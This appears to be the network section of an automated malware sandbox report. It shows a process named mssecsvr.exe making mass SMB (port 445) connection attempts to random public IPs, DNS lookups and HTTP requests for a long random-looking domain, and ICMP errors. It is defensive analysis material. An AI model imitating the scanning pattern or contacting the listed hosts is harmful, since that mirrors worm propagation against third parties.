                                                                                            Dec 22, 2022 10:08:21.393233061 CET61517445192.168.2.3221.88.235.204
                                                                                            Dec 22, 2022 10:08:21.393980980 CET61528445192.168.2.3187.189.237.211
                                                                                            Dec 22, 2022 10:08:21.394148111 CET61530445192.168.2.359.104.119.225
                                                                                            Dec 22, 2022 10:08:21.394484043 CET61534445192.168.2.3185.231.175.30
                                                                                            Dec 22, 2022 10:08:21.395457983 CET61549445192.168.2.33.61.30.254
                                                                                            Dec 22, 2022 10:08:21.419245005 CET4456144650.116.150.4192.168.2.3
                                                                                            Dec 22, 2022 10:08:21.420295000 CET44561534185.231.175.30192.168.2.3
                                                                                            Dec 22, 2022 10:08:21.421267033 CET61446445192.168.2.350.116.150.4
                                                                                            Dec 22, 2022 10:08:21.445632935 CET4456144445.60.37.6192.168.2.3
                                                                                            Dec 22, 2022 10:08:21.445676088 CET4456144445.60.37.6192.168.2.3
                                                                                            Dec 22, 2022 10:08:21.445697069 CET4456144445.60.37.6192.168.2.3
                                                                                            Dec 22, 2022 10:08:21.445858955 CET61444445192.168.2.345.60.37.6
                                                                                            Dec 22, 2022 10:08:21.445980072 CET61444445192.168.2.345.60.37.6
                                                                                            Dec 22, 2022 10:08:21.446037054 CET61444445192.168.2.345.60.37.6
                                                                                            Dec 22, 2022 10:08:21.450134993 CET61435445192.168.2.3155.101.201.1
                                                                                            Dec 22, 2022 10:08:21.592112064 CET61554445192.168.2.389.180.247.108
                                                                                            Dec 22, 2022 10:08:21.592250109 CET61555445192.168.2.3179.127.75.33
                                                                                            Dec 22, 2022 10:08:21.609370947 CET4456144445.60.37.6192.168.2.3
                                                                                            Dec 22, 2022 10:08:21.621906042 CET61441445192.168.2.3155.101.201.1
                                                                                            Dec 22, 2022 10:08:21.747068882 CET60543445192.168.2.3201.187.138.2
                                                                                            Dec 22, 2022 10:08:21.825045109 CET61446445192.168.2.350.116.150.4
                                                                                            Dec 22, 2022 10:08:21.934436083 CET61534445192.168.2.3185.231.175.30
                                                                                            Dec 22, 2022 10:08:21.960555077 CET44561534185.231.175.30192.168.2.3
                                                                                            Dec 22, 2022 10:08:22.231350899 CET61446445192.168.2.350.116.150.4
                                                                                            Dec 22, 2022 10:08:22.248683929 CET61419445192.168.2.3155.101.201.135
                                                                                            Dec 22, 2022 10:08:22.356483936 CET61435445192.168.2.3155.101.201.1
                                                                                            Dec 22, 2022 10:08:22.465807915 CET61534445192.168.2.3185.231.175.30
                                                                                            Dec 22, 2022 10:08:22.492052078 CET44561534185.231.175.30192.168.2.3
                                                                                            Dec 22, 2022 10:08:22.543956041 CET61441445192.168.2.3155.101.201.1
                                                                                            Dec 22, 2022 10:08:23.075232983 CET61446445192.168.2.350.116.150.4
                                                                                            Dec 22, 2022 10:08:24.200376987 CET61098445192.168.2.3155.100.73.7
                                                                                            Dec 22, 2022 10:08:24.201069117 CET61419445192.168.2.3155.101.201.135
                                                                                            Dec 22, 2022 10:08:24.201090097 CET61435445192.168.2.3155.101.201.1
                                                                                            Dec 22, 2022 10:08:24.358726025 CET804970534.104.35.123192.168.2.3
                                                                                            Dec 22, 2022 10:08:24.358946085 CET4970580192.168.2.334.104.35.123
                                                                                            Dec 22, 2022 10:08:24.403414965 CET61441445192.168.2.3155.101.201.1
                                                                                            Dec 22, 2022 10:08:24.403429985 CET61484445192.168.2.399.13.119.83
                                                                                            Dec 22, 2022 10:08:24.403435946 CET61491445192.168.2.379.170.194.23
                                                                                            Dec 22, 2022 10:08:24.403450012 CET61501445192.168.2.378.44.31.200
                                                                                            Dec 22, 2022 10:08:24.403455019 CET61549445192.168.2.33.61.30.254
                                                                                            Dec 22, 2022 10:08:24.403460979 CET61453445192.168.2.3186.181.241.168
                                                                                            Dec 22, 2022 10:08:24.403472900 CET61458445192.168.2.3155.19.210.154
                                                                                            Dec 22, 2022 10:08:24.403477907 CET61470445192.168.2.3149.3.21.14
                                                                                            Dec 22, 2022 10:08:24.403476000 CET61468445192.168.2.364.185.29.197
                                                                                            Dec 22, 2022 10:08:24.403486013 CET61497445192.168.2.346.250.86.107
                                                                                            Dec 22, 2022 10:08:24.403532028 CET61452445192.168.2.3163.211.186.155
                                                                                            Dec 22, 2022 10:08:24.575337887 CET61466445192.168.2.3131.111.74.84
                                                                                            Dec 22, 2022 10:08:24.575351954 CET61469445192.168.2.3121.136.134.250
                                                                                            Dec 22, 2022 10:08:24.575354099 CET61483445192.168.2.345.171.224.210
                                                                                            Dec 22, 2022 10:08:24.575352907 CET61487445192.168.2.342.76.203.30
                                                                                            Dec 22, 2022 10:08:24.575365067 CET61502445192.168.2.3124.155.31.180
                                                                                            Dec 22, 2022 10:08:24.575376034 CET61517445192.168.2.3221.88.235.204
                                                                                            Dec 22, 2022 10:08:24.575391054 CET61500445192.168.2.3140.151.52.246
                                                                                            Dec 22, 2022 10:08:24.575393915 CET61460445192.168.2.3190.246.58.25
                                                                                            Dec 22, 2022 10:08:24.575401068 CET61528445192.168.2.3187.189.237.211
                                                                                            Dec 22, 2022 10:08:24.575403929 CET61507445192.168.2.365.250.5.38
                                                                                            Dec 22, 2022 10:08:24.575403929 CET61511445192.168.2.374.182.17.236
                                                                                            Dec 22, 2022 10:08:24.575409889 CET61530445192.168.2.359.104.119.225
                                                                                            Dec 22, 2022 10:08:24.762860060 CET61554445192.168.2.389.180.247.108
                                                                                            Dec 22, 2022 10:08:24.762876987 CET61555445192.168.2.3179.127.75.33
                                                                                            Dec 22, 2022 10:08:24.763458014 CET61446445192.168.2.350.116.150.4
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Dec 22, 2022 10:04:13.266940117 CET5986953192.168.2.38.8.8.8
                                                                                            Dec 22, 2022 10:04:13.284641027 CET53598698.8.8.8192.168.2.3
                                                                                            Dec 22, 2022 10:04:13.768968105 CET5439753192.168.2.38.8.8.8
                                                                                            Dec 22, 2022 10:04:13.789828062 CET53543978.8.8.8192.168.2.3
                                                                                            Dec 22, 2022 10:04:14.725245953 CET5932453192.168.2.38.8.8.8
                                                                                            Dec 22, 2022 10:04:14.743592024 CET53593248.8.8.8192.168.2.3
                                                                                            Dec 22, 2022 10:04:15.207889080 CET5901453192.168.2.38.8.8.8
                                                                                            Dec 22, 2022 10:04:15.384067059 CET53590148.8.8.8192.168.2.3
                                                                                            Dec 22, 2022 10:04:16.970844030 CET6162653192.168.2.38.8.8.8
                                                                                            Dec 22, 2022 10:04:17.143960953 CET53616268.8.8.8192.168.2.3
                                                                                            Dec 22, 2022 10:04:17.563026905 CET6178753192.168.2.38.8.8.8
                                                                                            Dec 22, 2022 10:04:17.586348057 CET53617878.8.8.8192.168.2.3
                                                                                            Dec 22, 2022 10:05:31.988154888 CET138138192.168.2.3192.168.2.255
                                                                                            TimestampSource IPDest IPChecksumCodeType
                                                                                            Dec 22, 2022 10:04:36.912978888 CET206.2.204.199192.168.2.35a92(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:04:41.913621902 CET134.101.38.136192.168.2.37763(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:04:48.355710030 CET199.197.244.251192.168.2.3a429(Time to live exceeded in transit)Time Exceeded
                                                                                            Dec 22, 2022 10:04:50.899152994 CET131.196.195.245192.168.2.35c9e(Time to live exceeded in transit)Time Exceeded
                                                                                            Dec 22, 2022 10:04:51.888459921 CET149.11.89.129192.168.2.361e3(Net unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:04:57.635442019 CET131.196.245.142192.168.2.38660(Time to live exceeded in transit)Time Exceeded
                                                                                            Dec 22, 2022 10:04:59.948679924 CET90.85.68.111192.168.2.39021(Time to live exceeded in transit)Time Exceeded
                                                                                            Dec 22, 2022 10:05:01.881094933 CET178.202.115.115192.168.2.31eb3(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:05:05.855011940 CET76.234.2.67192.168.2.3974e(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:05:06.640911102 CET31.154.2.114192.168.2.3e6df(Host unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:05:07.849744081 CET88.157.97.75192.168.2.3ba7d(Net unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:05:08.075268030 CET218.234.161.66192.168.2.37f07(Time to live exceeded in transit)Time Exceeded
                                                                                            Dec 22, 2022 10:05:10.026278019 CET189.205.132.5192.168.2.3e1b7(Time to live exceeded in transit)Time Exceeded
                                                                                            Dec 22, 2022 10:05:10.129601002 CET209.148.235.54192.168.2.37e48(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:05:11.148201942 CET88.135.75.228192.168.2.3befd(Time to live exceeded in transit)Time Exceeded
                                                                                            Dec 22, 2022 10:05:13.472023964 CET154.113.20.94192.168.2.38c52(Time to live exceeded in transit)Time Exceeded
                                                                                            Dec 22, 2022 10:05:14.244441986 CET150.188.254.3192.168.2.3a4b0(Time to live exceeded in transit)Time Exceeded
                                                                                            Dec 22, 2022 10:05:14.578491926 CET122.209.234.46192.168.2.3eafd(Host unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:05:15.843585968 CET107.148.14.8192.168.2.33964(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:05:18.062750101 CET196.202.252.5192.168.2.338f(Time to live exceeded in transit)Time Exceeded
                                                                                            Dec 22, 2022 10:05:18.772325039 CET24.44.118.72192.168.2.3b790(Host unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:05:19.070811987 CET181.42.60.254192.168.2.3b129(Host unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:05:19.975693941 CET12.91.114.102192.168.2.3a3ea(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:05:20.274252892 CET74.51.228.112192.168.2.3ee68(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:05:21.295252085 CET93.234.75.248192.168.2.329b9(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:05:23.791003942 CET23.244.4.133192.168.2.37702(Host unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:05:25.563457966 CET203.208.148.206192.168.2.3248e(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:05:26.271821976 CET176.9.114.92192.168.2.3268f(Host unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:05:28.448206902 CET217.251.233.217192.168.2.359aa(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:05:28.629807949 CET223.196.21.179192.168.2.38b9a(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:05:29.575368881 CET10.1.1.225192.168.2.3b81(Time to live exceeded in transit)Time Exceeded
                                                                                            Dec 22, 2022 10:05:30.364875078 CET185.104.20.5192.168.2.3b8dd(Host unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:05:30.659457922 CET84.141.53.240192.168.2.379e9(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:05:30.834393024 CET74.128.6.50192.168.2.35c6a(Host unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:05:31.590409994 CET96.34.76.241192.168.2.35ea7(Host unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:05:36.262037992 CET88.78.146.135192.168.2.3322c(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:05:36.272492886 CET85.44.137.176192.168.2.34568(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:05:37.208127975 CET12.244.9.162192.168.2.36e2e(Host unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:05:39.726165056 CET178.7.152.163192.168.2.38e0a(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:05:42.270883083 CET113.177.31.121192.168.2.3532d(Time to live exceeded in transit)Time Exceeded
                                                                                            Dec 22, 2022 10:05:43.630717993 CET107.167.2.173192.168.2.32e1c(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:05:43.685945034 CET209.112.202.138192.168.2.391e9(Time to live exceeded in transit)Time Exceeded
                                                                                            Dec 22, 2022 10:05:50.967389107 CET82.82.7.96192.168.2.34459(Time to live exceeded in transit)Time Exceeded
                                                                                            Dec 22, 2022 10:05:52.041600943 CET193.111.37.114192.168.2.315d1(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:05:52.767227888 CET141.94.99.227192.168.2.3cf13(Host unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:05:54.293726921 CET87.183.240.9192.168.2.3c16b(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:05:54.766357899 CET64.111.81.245192.168.2.3c499(Time to live exceeded in transit)Time Exceeded
                                                                                            Dec 22, 2022 10:05:55.464236975 CET51.158.25.75192.168.2.3cb1(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:05:56.247009993 CET37.252.192.5192.168.2.3a8a3(Host unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:05:56.756299019 CET179.184.83.40192.168.2.37522(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:05:57.324640989 CET212.66.121.167192.168.2.3dbb(Host unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:06:00.215913057 CET211.25.155.197192.168.2.3d8d(Time to live exceeded in transit)Time Exceeded
                                                                                            Dec 22, 2022 10:06:02.285373926 CET187.185.228.244192.168.2.34edc(Time to live exceeded in transit)Time Exceeded
                                                                                            Dec 22, 2022 10:06:05.756505013 CET121.241.5.101192.168.2.32ae5(Time to live exceeded in transit)Time Exceeded
                                                                                            Dec 22, 2022 10:06:06.740088940 CET84.159.235.121192.168.2.339d7(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:06:07.965435982 CET62.253.64.154192.168.2.3c163(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:06:07.974822998 CET149.3.183.10192.168.2.38c37(Time to live exceeded in transit)Time Exceeded
                                                                                            Dec 22, 2022 10:06:08.651262999 CET217.147.171.87192.168.2.344bc(Host unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:06:08.967231035 CET217.93.127.169192.168.2.322b9(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:06:11.230254889 CET195.69.185.41192.168.2.38b9e(Time to live exceeded in transit)Time Exceeded
                                                                                            Dec 22, 2022 10:06:21.937731028 CET212.202.156.14192.168.2.32cb7(Host unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:06:24.139074087 CET92.212.223.130192.168.2.3f9dc(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:06:29.838339090 CET184.17.69.223192.168.2.3bdb5(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:06:29.987412930 CET118.27.124.180192.168.2.3b297(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:06:33.096132040 CET100.65.48.114192.168.2.34cd6(Time to live exceeded in transit)Time Exceeded
                                                                                            Dec 22, 2022 10:06:33.144223928 CET172.16.251.74192.168.2.39056(Time to live exceeded in transit)Time Exceeded
                                                                                            Dec 22, 2022 10:06:39.965363979 CET209.133.57.28192.168.2.3a5d6(Time to live exceeded in transit)Time Exceeded
                                                                                            Dec 22, 2022 10:06:41.130579948 CET196.34.50.98192.168.2.3cb9(Time to live exceeded in transit)Time Exceeded
                                                                                            Dec 22, 2022 10:06:45.300057888 CET168.206.70.211192.168.2.3af69(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:06:46.397840023 CET103.134.116.9192.168.2.3a97b(Time to live exceeded in transit)Time Exceeded
                                                                                            Dec 22, 2022 10:06:47.451041937 CET148.51.252.152192.168.2.35e95(Time to live exceeded in transit)Time Exceeded
                                                                                            Dec 22, 2022 10:06:48.754187107 CET36.239.14.199192.168.2.39cb8(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:06:51.212970018 CET12.90.203.58192.168.2.3b998(Host unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:06:51.484667063 CET10.7.4.1192.168.2.31a24(Host unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:06:53.932780027 CET189.198.211.81192.168.2.3f06a(Host unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:06:54.245089054 CET154.26.215.36192.168.2.33107(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:06:56.454598904 CET4.78.222.182192.168.2.3aa18(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:07:00.373182058 CET172.16.5.254192.168.2.3b758(Host unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:07:01.422334909 CET87.122.107.252192.168.2.3dcfc(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:07:01.428637028 CET178.12.73.93192.168.2.3c50e(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:07:05.009860992 CET217.95.145.133192.168.2.3e72(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:07:06.128721952 CET84.46.41.168192.168.2.3bcd2(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:07:06.242084980 CET208.184.166.134192.168.2.3c03e(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:07:10.385139942 CET10.55.155.122192.168.2.39c7e(Host unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:07:14.008796930 CET94.229.159.174192.168.2.390fb(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:07:18.603642941 CET207.113.239.73192.168.2.37e80(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:07:24.809533119 CET185.20.43.217192.168.2.3e283(Host unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:07:29.163644075 CET79.172.220.184192.168.2.38bd7(Host unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:07:29.467159033 CET2.203.117.30192.168.2.3aae7(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:07:35.044472933 CET213.200.162.120192.168.2.3b3f2(Host unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:07:46.142802000 CET79.145.59.170192.168.2.33862(Host unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:07:50.421916962 CET92.217.78.194192.168.2.3e951(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:07:51.418428898 CET201.182.244.9192.168.2.376cb(Time to live exceeded in transit)Time Exceeded
                                                                                            Dec 22, 2022 10:07:51.871793985 CET206.126.21.90192.168.2.39e82(Host unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:07:52.453841925 CET134.129.29.123192.168.2.34d9d(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:07:52.476682901 CET138.97.192.78192.168.2.3be56(Host unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:07:53.493820906 CET84.137.47.162192.168.2.32cc2(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:07:53.696108103 CET177.54.224.234192.168.2.329d3(Time to live exceeded in transit)Time Exceeded
                                                                                            Dec 22, 2022 10:07:54.785120964 CET156.234.43.168192.168.2.3885a(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:07:55.800215960 CET69.32.224.12192.168.2.3e034(Time to live exceeded in transit)Time Exceeded
                                                                                            Dec 22, 2022 10:08:03.301932096 CET83.169.172.200192.168.2.355e5(Host unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:08:03.913003922 CET213.127.63.129192.168.2.3a842(Port unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:08:05.116461992 CET46.15.50.23192.168.2.3185d(Port unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:08:05.621643066 CET31.16.69.23192.168.2.33f39(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:08:12.457041025 CET208.124.98.252192.168.2.36d6b(Time to live exceeded in transit)Time Exceeded
                                                                                            Dec 22, 2022 10:08:17.306782007 CET138.97.192.78192.168.2.3be6a(Host unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:08:18.386706114 CET138.97.192.78192.168.2.3be6b(Host unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:08:19.042079926 CET83.169.143.141192.168.2.330a9(Time to live exceeded in transit)Time Exceeded
                                                                                            Dec 22, 2022 10:08:19.446751118 CET138.97.192.78192.168.2.3be6c(Host unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:08:20.280308008 CET145.220.78.2192.168.2.3d0f4(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:08:20.288980961 CET81.228.78.153192.168.2.36242(Unknown)Destination Unreachable
                                                                                            Dec 22, 2022 10:08:20.526789904 CET138.97.192.78192.168.2.3be6d(Host unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:08:20.744642973 CET138.97.192.77192.168.2.3a92e(Time to live exceeded in transit)Time Exceeded
                                                                                            Dec 22, 2022 10:08:21.596610069 CET138.97.192.78192.168.2.3be6e(Host unreachable)Destination Unreachable
                                                                                            Dec 22, 2022 10:08:21.824070930 CET138.97.192.77192.168.2.34810(Time to live exceeded in transit)Time Exceeded
                                                                                            Dec 22, 2022 10:08:24.995675087 CET138.97.192.77192.168.2.34810(Time to live exceeded in transit)Time Exceeded
                                                                                            Dec 22, 2022 10:08:25.987701893 CET37.65.170.235192.168.2.39d77(Port unreachable)Destination Unreachable
                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Dec 22, 2022 10:04:13.266940117 CET192.168.2.38.8.8.80x8d3aStandard query (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comA (IP address)IN (0x0001)false
                                                                                            Dec 22, 2022 10:04:13.768968105 CET192.168.2.38.8.8.80xef3fStandard query (0)ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comA (IP address)IN (0x0001)false
                                                                                            Dec 22, 2022 10:04:14.725245953 CET192.168.2.38.8.8.80x7bb4Standard query (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comA (IP address)IN (0x0001)false
                                                                                            Dec 22, 2022 10:04:15.207889080 CET192.168.2.38.8.8.80xa243Standard query (0)ww25.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comA (IP address)IN (0x0001)false
                                                                                            Dec 22, 2022 10:04:16.970844030 CET192.168.2.38.8.8.80xae50Standard query (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comA (IP address)IN (0x0001)false
                                                                                            Dec 22, 2022 10:04:17.563026905 CET192.168.2.38.8.8.80x4f9bStandard query (0)ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comA (IP address)IN (0x0001)false
                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Dec 22, 2022 10:04:13.284641027 CET8.8.8.8192.168.2.30x8d3aNo error (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com103.224.212.220A (IP address)IN (0x0001)false
                                                                                            Dec 22, 2022 10:04:13.789828062 CET8.8.8.8192.168.2.30xef3fNo error (0)ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com701602.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                                                                                            Dec 22, 2022 10:04:13.789828062 CET8.8.8.8192.168.2.30xef3fNo error (0)701602.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)false
                                                                                            Dec 22, 2022 10:04:13.789828062 CET8.8.8.8192.168.2.30xef3fNo error (0)701602.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)false
                                                                                            Dec 22, 2022 10:04:14.743592024 CET8.8.8.8192.168.2.30x7bb4No error (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com103.224.212.220A (IP address)IN (0x0001)false
                                                                                            Dec 22, 2022 10:04:15.384067059 CET8.8.8.8192.168.2.30xa243No error (0)ww25.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com77026.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                            Dec 22, 2022 10:04:15.384067059 CET8.8.8.8192.168.2.30xa243No error (0)77026.bodis.com199.59.243.222A (IP address)IN (0x0001)false
                                                                                            Dec 22, 2022 10:04:17.143960953 CET8.8.8.8192.168.2.30xae50No error (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com103.224.212.220A (IP address)IN (0x0001)false
                                                                                            Dec 22, 2022 10:04:17.586348057 CET8.8.8.8192.168.2.30x4f9bNo error (0)ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com701602.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                                                                                            Dec 22, 2022 10:04:17.586348057 CET8.8.8.8192.168.2.30x4f9bNo error (0)701602.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)false
                                                                                            Dec 22, 2022 10:04:17.586348057 CET8.8.8.8192.168.2.30x4f9bNo error (0)701602.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)false
                                                                                            • fs.microsoft.com
                                                                                            • https:
                                                                                              • www.bing.com
                                                                                            • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com
                                                                                            • ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com
                                                                                            • ww25.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com
                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            0192.168.2.34971923.211.4.90443C:\Windows\mssecsvr.exe
                                                                                            TimestampkBytes transferredDirectionData


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            1192.168.2.34972123.211.4.90443C:\Windows\mssecsvr.exe
                                                                                            TimestampkBytes transferredDirectionData


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            10192.168.2.349710103.224.212.22080C:\Windows\mssecsvr.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Dec 22, 2022 10:04:17.339276075 CET8OUTGET / HTTP/1.1
                                                                                            Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: __tad=1671699853.2492624


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            11103.224.212.22080192.168.2.349710C:\Windows\mssecsvr.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Dec 22, 2022 10:04:17.527674913 CET8INHTTP/1.1 302 Found
                                                                                            date: Thu, 22 Dec 2022 09:04:17 GMT
                                                                                            server: Apache/2.4.38 (Debian)
                                                                                            location: http://ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/
                                                                                            content-length: 0
                                                                                            content-type: text/html; charset=UTF-8
                                                                                            connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            12192.168.2.34971613.248.148.25480C:\Windows\mssecsvr.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Dec 22, 2022 10:04:17.611576080 CET9OUTGET / HTTP/1.1
                                                                                            Cache-Control: no-cache
                                                                                            Host: ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com
                                                                                            Connection: Keep-Alive


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            1313.248.148.25480192.168.2.349716C:\Windows\mssecsvr.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Dec 22, 2022 10:04:17.745702028 CET14INHTTP/1.1 403 Forbidden
                                                                                            Date: Thu, 22 Dec 2022 09:04:17 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 146
                                                                                            Connection: keep-alive
                                                                                            Server: nginx
                                                                                            Vary: Accept-Encoding
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            1445.60.37.1445192.168.2.359611C:\Windows\mssecsvr.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Dec 22, 2022 10:08:01.125467062 CET514INHTTP/1.1 400 Bad Request
                                                                                            Content-Type: text/html
                                                                                            Cache-Control: no-cache, no-store
                                                                                            Connection: close
                                                                                            Content-Length: 703
                                                                                            X-Iinfo: 14-471605949-0 0NNN RT(1671700080215 54) q(-1 -1 -1 -1) r(0 -1) b1
